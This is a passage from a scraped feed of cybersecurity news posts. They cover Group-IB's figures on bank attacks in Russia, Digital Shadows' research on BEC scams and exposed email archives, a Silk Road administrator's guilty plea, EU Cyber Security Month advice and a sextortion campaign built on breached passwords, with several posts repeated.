Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies, however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted at attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend aimed at reducing threats from banking Trojans for PCs has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and companies executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users, however in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in the damage among customers can be explained by banks and payment systems introducing technologies for early fraud detection that use behavioral analysis algorithms, allowing to detect attacks, that combine social engineering scams phishing, botnets, illegal money withdrawal networks and fraud across multiple channels and other types of banking fraud on all customer devices and platforms

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest amount of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – financial sector, cybercrime)

The post Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks appeared first on Security Affairs.



Security Affairs

Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups, however stolen money — is not the most dangerous thing that could happen to a financial organization”, — says Ilya Sachkov, Group-IB CEO and founder.  “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one   financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies, however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted at attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend aimed at reducing threats from banking Trojans for PCs has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and companies executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users, however in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in the damage among customers can be explained by banks and payment systems introducing technologies for early fraud detection that use behavioral analysis algorithms, allowing to detect attacks, that combine social engineering scams phishing, botnets, illegal money withdrawal networks and fraud across multiple channels and other types of banking fraud on all customer devices and platforms

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest amount of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”

About the author Group-IB

Group-IB is one the world’s leading providers of solutions aimed at detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. GIB Threat Intelligence cyber threats data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55 000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing a rapid response to cyber incidents—CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – financial sector, cybercrime)

The post Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks appeared first on Security Affairs.

BEC scams, hacked accounts available from $150 up to $5,000

Security experts from Digital Shadows have conducted an interesting study about the technique adopted by crooks to infiltrate company emails, so-called BEC scam.

According to the FBI, the number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

Business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018, in the same period overall BEC/EAC losses result in $12 billion.

Experts from Digital Shadows highlighted the availability of huge archive online that could be used by crooks to target the companies. It is quite easy to find online AWS buckets containing backups of email archives, the same data could be found on publicly-accessible rsync, FTP, SMB, and NAS drives.

The experts estimated that some 12.5 million archive files (.eml, .msg, .pst, .ost, .mbox) containing sensitive and financial information have been exposed online.

“Digital Shadows detected 33,568 email addresses of finance departments exposed through third party compromises. Eighty-three percent (27,992) of these emails had passwordsassociated with them. If these passwords have been reused for corporate accounts, this may leave organizations at risk to account takeovers.” reads the report published by Digital Shadows.

Experts found over 50,000 email files that contained terms such as “invoice”, “payment”, or “purchase order” terms in misconfigured or unauthenticated file stores.

In some cases, the compromised email archives included also passport scans. According to the report, crooks use to search for company emails that contained “ap@”, “ar@”, “accounting@”, “accountreceivable@”, “accountpayable@”, and “invoice@”.

Company credentials are a valuable commodity in the cybercrime underground, they are offered up to $5,000 for a single username and password pair.

BEC

The growing interest of cybercriminals in BEC scams has driven the growth of BEC-as-a-Service,  this kind of services is widely available for as little as $150.

“It’s possible to outsource this work to online actors, who will acquire company credentials for a set fee or percentage of earnings. The price will vary depending on the type of mail service, but services are available from as little as $150.” continues the report.

Experts warn that BEC attacks are a global problem, email archives are exposed predominantly across the European Union (5.2 million), North America (2.9 million), and Asia-Pacific (2 million).

In order to reduce the risk, Digital Shadows experts recommend the following measures to organizations:

  • Update security awareness training content to include the Business Email Compromise (BEC) scenario
  • Include BEC within incident response/business continuity planning
  • Work with wire transfer application vendors to build in manual controls, as well as multiple person authorizations to approve significant wire transfers
  • Continuously monitor for exposed credentials. This is particularly important for finance department emails
  • Conduct ongoing assessments of executives’ digital footprints – threat actors will perform their reconnaissance on high-value targets. Start with using Google Alerts to track new web content related to them
  • Prevent email archives being publicly exposed
  • Businesses should be aware of the risks of their contractors who back up their emails on Network Attached Storage (NAS) devices. Users should add a password and disable guest/anonymous access, as well as opt for NAS devices that are secured by default.

Below the key findings of the report:

  • Corporate email accounts can be compromised for as little as $150
  • A look inside the planning of a targeted Business Email Compromise campaign
  • More than 33,000 accounting email credentials are exposed
  • 12.5 million email archive files are exposed across online file stores
  • The risks of BEC can be mitigated with a range of security measures

Pierluigi Paganini

(Security Affairs – WECON, SCADA)

The post BEC scams, hacked accounts available from $150 up to $5,000 appeared first on Security Affairs.

Security Affairs: BEC scams, hacked accounts available from $150 up to $5,000

Security experts from Digital Shadows have conducted an interesting study about the technique adopted by crooks to infiltrate company emails, so-called BEC scam.

According to the FBI, the number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

Business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018, in the same period overall BEC/EAC losses result in $12 billion.

Experts from Digital Shadows highlighted the availability of huge archive online that could be used by crooks to target the companies. It is quite easy to find online AWS buckets containing backups of email archives, the same data could be found on publicly-accessible rsync, FTP, SMB, and NAS drives.

The experts estimated that some 12.5 million archive files (.eml, .msg, .pst, .ost, .mbox) containing sensitive and financial information have been exposed online.

“Digital Shadows detected 33,568 email addresses of finance departments exposed through third party compromises. Eighty-three percent (27,992) of these emails had passwordsassociated with them. If these passwords have been reused for corporate accounts, this may leave organizations at risk to account takeovers.” reads the report published by Digital Shadows.

Experts found over 50,000 email files that contained terms such as “invoice”, “payment”, or “purchase order” terms in misconfigured or unauthenticated file stores.

In some cases, the compromised email archives included also passport scans. According to the report, crooks use to search for company emails that contained “ap@”, “ar@”, “accounting@”, “accountreceivable@”, “accountpayable@”, and “invoice@”.

Company credentials are a valuable commodity in the cybercrime underground, they are offered up to $5,000 for a single username and password pair.

BEC

The growing interest of cybercriminals in BEC scams has driven the growth of BEC-as-a-Service,  this kind of services is widely available for as little as $150.

“It’s possible to outsource this work to online actors, who will acquire company credentials for a set fee or percentage of earnings. The price will vary depending on the type of mail service, but services are available from as little as $150.” continues the report.

Experts warn that BEC attacks are a global problem, email archives are exposed predominantly across the European Union (5.2 million), North America (2.9 million), and Asia-Pacific (2 million).

In order to reduce the risk, Digital Shadows experts recommend the following measures to organizations:

  • Update security awareness training content to include the Business Email Compromise (BEC) scenario
  • Include BEC within incident response/business continuity planning
  • Work with wire transfer application vendors to build in manual controls, as well as multiple person authorizations to approve significant wire transfers
  • Continuously monitor for exposed credentials. This is particularly important for finance department emails
  • Conduct ongoing assessments of executives’ digital footprints – threat actors will perform their reconnaissance on high-value targets. Start with using Google Alerts to track new web content related to them
  • Prevent email archives being publicly exposed
  • Businesses should be aware of the risks of their contractors who back up their emails on Network Attached Storage (NAS) devices. Users should add a password and disable guest/anonymous access, as well as opt for NAS devices that are secured by default.

Below the key findings of the report:

  • Corporate email accounts can be compromised for as little as $150
  • A look inside the planning of a targeted Business Email Compromise campaign
  • More than 33,000 accounting email credentials are exposed
  • 12.5 million email archive files are exposed across online file stores
  • The risks of BEC can be mitigated with a range of security measures

Pierluigi Paganini

(Security Affairs – WECON, SCADA)

The post BEC scams, hacked accounts available from $150 up to $5,000 appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 183 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Estonia sues Gemalto for 152M euros over flaws in citizen ID cards issued by the company
·      FBI IC3 warns of cyber attacks exploiting Remote Desktop Protocol (RDP)
·      Attackers chained three bugs to breach into the Facebook platform
·      Cyber Defense Magazine – October 2018 has arrived. Enjoy it!
·      Expert demonstrated how to access contacts and photos from a locked iPhone XS
·      GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers
·      Telegram CVE-2018-17780 flaw causes the leak of IP addresses when initiating calls
·      Adobe security updates for Acrobat fix 86 Vulnerabilities, 46 rated as critical
·      FCA fines Tesco Bank £16.4m over 2016 cyber attack
·      Foxit Reader 9.3 addresses 118 Vulnerabilities, 18 of them rated as critical
·      The ‘Gazorp Azorult Builder emerged from the Dark Web
·      Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!
·      Experts found 9 NAS flaws that expose LenovoEMC, Iomega Devices to hack
·      Hidden Cobra APT used the new ATM cash-out scheme FASTCash to hit banks worldwide
·      New Danabot Banking Malware campaign now targets banks in the U.S.
·      Researchers associated the recently discovered NOKKI Malware to North Korean APT
·      Z-LAB Report – Analyzing the GandCrab v5 ransomware
·      APT38 is behind financially motivated attacks carried out by North Korea
·      Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?
·      China planted tiny chips on US computers for cyber espionage
·      CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
·      US offers its cyber warfare defense capabilities to NATO
·      Canada blames Russia for cyber attacks against its structures
·      DHS issued an alert on attacks aimed at Managed Service Providers
·      Experts warns of a new extortion campaign based on the Breach Compilation archive
·      Sales intel firm Apollo data breach exposed more than 200 million contact records
·      US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations
·      Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison
·      Sony Bravia Smart TVs affected by a critical vulnerability
·      Windows 10 October 2018 Update could cause CCleaner stop working

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 183 – News of the week appeared first on Security Affairs.

Security Affairs: Security Affairs newsletter Round 183 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Estonia sues Gemalto for 152M euros over flaws in citizen ID cards issued by the company
·      FBI IC3 warns of cyber attacks exploiting Remote Desktop Protocol (RDP)
·      Attackers chained three bugs to breach into the Facebook platform
·      Cyber Defense Magazine – October 2018 has arrived. Enjoy it!
·      Expert demonstrated how to access contacts and photos from a locked iPhone XS
·      GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers
·      Telegram CVE-2018-17780 flaw causes the leak of IP addresses when initiating calls
·      Adobe security updates for Acrobat fix 86 Vulnerabilities, 46 rated as critical
·      FCA fines Tesco Bank £16.4m over 2016 cyber attack
·      Foxit Reader 9.3 addresses 118 Vulnerabilities, 18 of them rated as critical
·      The ‘Gazorp Azorult Builder emerged from the Dark Web
·      Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!
·      Experts found 9 NAS flaws that expose LenovoEMC, Iomega Devices to hack
·      Hidden Cobra APT used the new ATM cash-out scheme FASTCash to hit banks worldwide
·      New Danabot Banking Malware campaign now targets banks in the U.S.
·      Researchers associated the recently discovered NOKKI Malware to North Korean APT
·      Z-LAB Report – Analyzing the GandCrab v5 ransomware
·      APT38 is behind financially motivated attacks carried out by North Korea
·      Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?
·      China planted tiny chips on US computers for cyber espionage
·      CVE-2018-4251 – Apple did not disable Intel Manufacturing Mode in its laptops
·      US offers its cyber warfare defense capabilities to NATO
·      Canada blames Russia for cyber attacks against its structures
·      DHS issued an alert on attacks aimed at Managed Service Providers
·      Experts warns of a new extortion campaign based on the Breach Compilation archive
·      Sales intel firm Apollo data breach exposed more than 200 million contact records
·      US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations
·      Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison
·      Sony Bravia Smart TVs affected by a critical vulnerability
·      Windows 10 October 2018 Update could cause CCleaner stop working

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 183 – News of the week appeared first on Security Affairs.



Security Affairs

Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

By Waqas

It is not happening on Dark Web but Instagram. Instagram has become much more than a platform to share your traveling, culinary, or fitness-related experiences, but a thriving portal for selling stolen accounts. Reportedly, hackers are using Instagram to sell access to botnets as well as stolen user accounts from Spotify, Fortnite and other services. […]

This is a post from HackRead.com Read the original post: Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

Silk Road Admin Pleads Guilty- Might Receive 20 Years Jail Time

By Waqas

An Irish national Gary Davis, who is also known as Libertas, has pleaded guilty to charges related to drug trafficking and is now facing up to 20 years in prison. Davis is accused of running the infamous marketplace Silk Road and served as forum moderator and site administrator while he was involved in the selling […]

This is a post from HackRead.com Read the original post: Silk Road Admin Pleads Guilty- Might Receive 20 Years Jail Time

Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison

Gary Davis, one of the admins and moderators of the notorious Silk Road black marketplace, pleaded guilty to drug trafficking charges.

Gary Davis is an Irish national (20) who was one of the admins and moderators of the notorious Silk Road black marketplace, on Friday he pleaded guilty to drug trafficking charges.

“Geoffrey S. Berman, the United States Attorney for the Southern District of New York, announced that GARY DAVIS, a/k/a “Libertas,” pled guilty today to conspiring to distribute massive quantities of narcotics, a charge arising out of his role as a member of the small administrative staff of “Silk Road.”  ” reads the DoJ press release.

“Manhattan U.S. Attorney Geoffrey S. Berman said:  “Silk Road was a secret online marketplace for illegal drugs, hacking services, and a whole host of other criminal activity.  As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace.  Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution.”

Silk Road

 

The man, who is also known as Libertas, could face a maximum sentence of 20 years in prison. Davis also provided customer support to Silk Road users in 2013, for this job he received a weekly salary.

“From May 2013 up to June 2013, DAVIS served as a forum moderator for Silk Road.  From June 2013 up to October 2, 2013, DAVIS worked as a site administrator on Silk Road. ” continues the press release.

“In his role as a site administrator, DAVIS’s responsibilities included (1) responding to customer support requests from Silk Road users who needed assistance with their buyer or seller accounts on the marketplace; (2) serving as an arbitrator by resolving disputes that arose between drug dealers and buyers on the site; and (3) enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. “

Silk Road was seized by law enforcement in 2013 and his founder Ross William Ulbricht (aka Dread Pirate Roberts) was arrested, later it was sentenced to life in prison after being convicted on multiple counts related to the Silk Road activity.

According to FBI, between February of 2011 and July 2013, Silk Road managed $1.2 billion worth of transactions for 957,079 users, the total earning for Ulbricht was nearly $80 million.

According to the DoJ press release, more than $200 million worth of illegal drugs and other contraband were sold through the black market.

The FBI also seized about $33.6 million worth of Bitcoin that were sold by authorities in a series of auctions.

In November 2013, after the seizure of the original Silk Road, a new version of the popular black market was launched, so-called Silk Road 2.0, and Libertas was one of the administrators, but it is not clear is the pseudonymous was still used by Davis at the time.

Davis was identified and arrested in Ireland in January 2014, he made opposition to the extradition in the U.S. due to his mental health and fearing for his life. He was arguing that the extradition and consequent incarceration in the U.S. were violating his fundamental rights.

Davis was extradited to the United States in July 2014, he is expected to be sentenced on 17 January 2019 by Judge Furman.
“DAVIS, 30, of Wicklow, Ireland, pled guilty to one count of conspiracy to distribute narcotics, which carries a maximum sentence of 20 years in prison.” concludes the DoJ. “The maximum potential sentence in this case is prescribed by Congress and is provided here for informational purposes only, as any sentencing of the defendant will be determined by the judge.  DAVIS is scheduled to be sentenced by Judge Furman on January 17, 2019 at 3:30 p.m.”

Pierluigi Paganini

(Security Affairs – Tor, cybercrime)

The post Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison appeared first on Security Affairs.

Don’t ever use a VPN without paying attention to these five things

By John Mason

Ryan Lin was just recently sentenced to 17 years in prison. He was sentenced for committing a range of crimes including cyberstalking, computer fraud and abuse, aggravated identity theft, and distribution of child pornography. These are all serious crimes that I in no way support or condone, but why am I particularly interested in the […]

This is a post from HackRead.com Read the original post: Don’t ever use a VPN without paying attention to these five things

EU Cyber Security Month roundup – advice on staying secure

During October, BH Consulting has been sharing daily advice about digital security and privacy on its social media channels as part of EU Cyber Security Month. This blog gathers together all of these tips into a single place. As each week goes by, we will keep adding to the content, in descending order. By the end of October, it will be a single resource for security advice you can share with colleagues or friends and family.

EU Cyber Security Month – tips from week three

Week three of EU Cyber Security Month began with a reminder about the importance of reading. Well researched, highly regarded reports like Europol’s IOCTA (internet organised crime threat assessment) and the Verizon Data Breach Investigations Report are valuable sources of intel.

Improving security culture is often a matter of taking some simple steps to improve readiness. The UK’s National Cyber Security Centre looks at 10 of these areas with a series of free guides. The advice includes making security a board-level responsibility, through to implementing secure configuration and managing user privileges to stop threats.

With threats and risks changing all the time – while your organisation also adapts and grows – it’s essential to stay on top of current best practice. Our Thursday tip reminded that it’s always worth refreshing your knowledge of network and information security. We linked to a quick-fire quiz from the organisers of EU Cyber Security Awareness Month. Taking the quiz might identify areas where you can up your game.

Our fourth tip of the week was aimed at organisations with mature security controls. For those with confidence in their defences but wanting to improve, a red team exercise can identify possible weak points. Here’s our blog about the benefits of red teaming.

Now that we accept that security incidents can lead to business downtime, what can we do about it? We start by making the organisation resilient. This happens through agreed processes and careful preparation so that if the worst happens, the business can keep operating. BH Consulting CEO Brian Honan has spoken about this very topic, and that was our link for the final tip of the week.

EU Cyber Security Month – tips from week two

We kicked off week two of EU Cyber Security Month with a reminder that information security covers more than just data. Having a clean desk policy at work can protect important information in physical documents, as well as computers. Here’s a good sample policy developed by SANS Institute.

Our second tip of week two covers a key starting point for any good security plan. Knowing what data you hold helps in making choices about what level of protection it will need. (This is also an important part of privacy and data protection strategy, too.) We recently blogged about classifying data in this way, referring to IBM’s recent decision to ban USB storage keys.

Day three was a reminder that data breaches and security incidents are crimes. By reporting these cases to police, victims not only help with the investigation of their own incident, they also contribute valuable information to help law enforcement tackle cybercrime.

Next, we explained how digital forensics capability can help in tracing internal security incidents. Companies with the security resources in place can set up their own digital forensics lab without needing a large investment. Having an in-house lab allows security teams to carry out inquiries into everything from a security breach to HR issues.

Rounding out our advice for the week, we focused on the importance of risk assessment. This is where security and business goals meet. The key to developing solid risk assessment is to have a repeatable approach that guides your decisions. For this tip, we linked to David Prendergast’s excellent blog with advice on developing just such a risk assessment framework.

EU Cyber Security Month – tips from week one

Our first tip raised awareness of the need to prevent CEO fraud and fake invoice scams in your business. This is easy to do and doesn’t need technical fix; it’s just a matter of changing your business processes. Anyone with access to payment systems should check with a colleague before paying money to unfamiliar accounts. Here’s a link to a recent blog we posted about this.

Tip number two covers ransomware, which is one of the most widespread security threats today. Regularly backing up your data can help you recover from a ransomware infection. You’ll find more details here.

For our third tip of the week, we looked at phishing: one of the most effective tactics in an attacker’s arsenal. One of the best investments you can make is in security awareness: train company staff to spot fake emails.

We use so many different online services and invariably, they all ask us for a password. It’s vital to use different pass phrases a password manager when logging in to these services as securely as possible. Here are our tips on what to do – and not to do – when choosing a password.

For our last tip of week one, we covered data breaches. Unfortunately, they’re all too common and there seems to be a new incident on an almost weekly basis. Planning and preparation in advance of a possible breach means you’ll be ready to react if the worst happens. In today’s climate, you’ll be judged not on having suffered a breach but how well you respond to it. Here’s our advice for putting that plan in place.

Be sure to check back as we update the page throughout October. You can also catch the daily tips as they land by following BH Consulting on Twitter or on LinkedIn.

 

The post EU Cyber Security Month roundup – advice on staying secure appeared first on BH Consulting.

Experts warns of a new extortion campaign based on the Breach Compilation archive

Cybaze ZLab spotted a new scam campaign that is targeting some of its Italian customers, crooks leverage credentials in Breach Compilation archive.

Security experts from Cybaze ZLab have spotted a new scam campaign that is targeting some of its Italian customers.

Crooks attempted to monetize the availability of a huge quantity of credentials available in the underground market to target unaware netizens in a new extortion scheme.

The number of spam messages associated with this campaign is rapidly increasing, the attackers behind this campaign used the credentials collected in the infamous database dubbed ‘Breach Compilation’.

This Breach Compilation archive contains about 1.4 Billion of clear text credentials gathered in a series of data breaches.

At the time it is still unclear if the attackers have created a pool of emails used in the spam campaign or are exploiting credential stuffing attack to attempt to access email accounts of unaware users and use them to send out spam messages.

The credential stuffing attacks involve botnets to try stolen login credentials usually obtained through phishing attacks and data breaches. This kind of attacks is very efficient due to the bad habit of users of reusing the same password over multiple services.

In the following image is reported as an example, one of the messages used in this campaign.

The message is a classical email scam used by cyber criminals to threaten the victim to reveal to the public that he watches porn videos. Crooks claim to have the recording of the victim while watching the videos, but it is absolutely false.

Crooks blackmail the victims and request the payment of a fee in Bitcoin to avoid spreading the video.

To be more convincing and trick victims into paying the fee, the hackers include in the body of the email the password used by the victim as a proof of the attack. This password was extracted from the Breach Compilation archive.

